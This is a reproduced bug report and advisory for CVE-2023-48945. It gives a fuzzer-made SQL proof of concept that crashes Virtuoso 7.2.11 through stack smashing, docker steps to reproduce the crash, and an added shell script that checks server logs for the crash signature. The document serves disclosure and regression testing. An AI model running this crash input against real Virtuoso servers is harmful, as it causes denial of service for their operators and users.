CVE-2023-48945: Fuzzer: Virtuoso 7.2.11 crashed by stack smashing · Issue #1172 · openlink/virtuoso-opensource

A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 DECIMAL ) ; INSERT INTO v0 VALUES ( 0 ) ; INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE -128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; UPDATE v0 SET v1 = ( SELECT DISTINCT * FROM v0 ) ;

Server Log:

14:21:24 HTTP/WebDAV server online at 8890
14:21:24 Server online at 1111 (pid 1)
*** stack smashing detected ***: terminated

Due to the stack smashing, I failed to retrieve the correct backtrace.

Ways to reproduce (write the PoC to the file '/tmp/test.sql' first):

remove the old one

docker container rm virtdb_test -f

start virtuoso through docker

docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11

wait for the server to start

sleep 10

check whether the simple query works

echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba

run the poc

cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
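
A log check for the crash signature shown in the server log above, for verifying whether a given build still aborts; this is an added example, not part of the original issue. The function name `classify_virtuoso_log` and the sample variables are assumptions made for illustration, and the second sample log is constructed.

```shell
#!/bin/sh
# Added example (not from the issue): classify a Virtuoso server log read
# from stdin. Prints "crashed-ssp after <time>", "running" or "not-started".
# Exit status is 1 when the glibc stack-protector abort is present, else 0.
classify_virtuoso_log() {
    awk '
        # Startup banner, e.g. "14:21:24 Server online at 1111 (pid 1)"
        /^[0-9][0-9]:[0-9][0-9]:[0-9][0-9] Server online at [0-9]+/ {
            online = 1; last_ts = $1; next
        }
        # Any other timestamped line: remember the last time the server logged
        /^[0-9][0-9]:[0-9][0-9]:[0-9][0-9] / { last_ts = $1; next }
        # Abort message from the stack protector; it carries no timestamp
        /\*\*\* stack smashing detected \*\*\*/ { ssp = 1; exit }
        END {
            if (ssp) {
                print "crashed-ssp after " (last_ts ? last_ts : "unknown")
                exit 1
            }
            if (online) print "running"
            else        print "not-started"
        }
    '
}

# Sample 1: the server log quoted in the issue.
SAMPLE_CRASH_LOG='14:21:24 HTTP/WebDAV server online at 8890
14:21:24 Server online at 1111 (pid 1)
*** stack smashing detected ***: terminated'

# Sample 2: constructed log of a server that started and did not abort.
SAMPLE_HEALTHY_LOG='14:21:24 HTTP/WebDAV server online at 8890
14:21:24 Server online at 1111 (pid 1)'

# Demo run; "|| true" keeps the non-zero crash status from stopping a caller
# that uses "set -e".
printf '%s\n' "$SAMPLE_CRASH_LOG"   | classify_virtuoso_log || true
printf '%s\n' "$SAMPLE_HEALTHY_LOG" | classify_virtuoso_log || true
```

In a regression check, feed it the container output after the reproduction steps, for example `docker logs virtdb_test 2>&1 | classify_virtuoso_log`, assuming the container writes its server log to stdout/stderr as in the excerpt above.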

Related news

Ubuntu Security Notice USN-6879-1

Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.
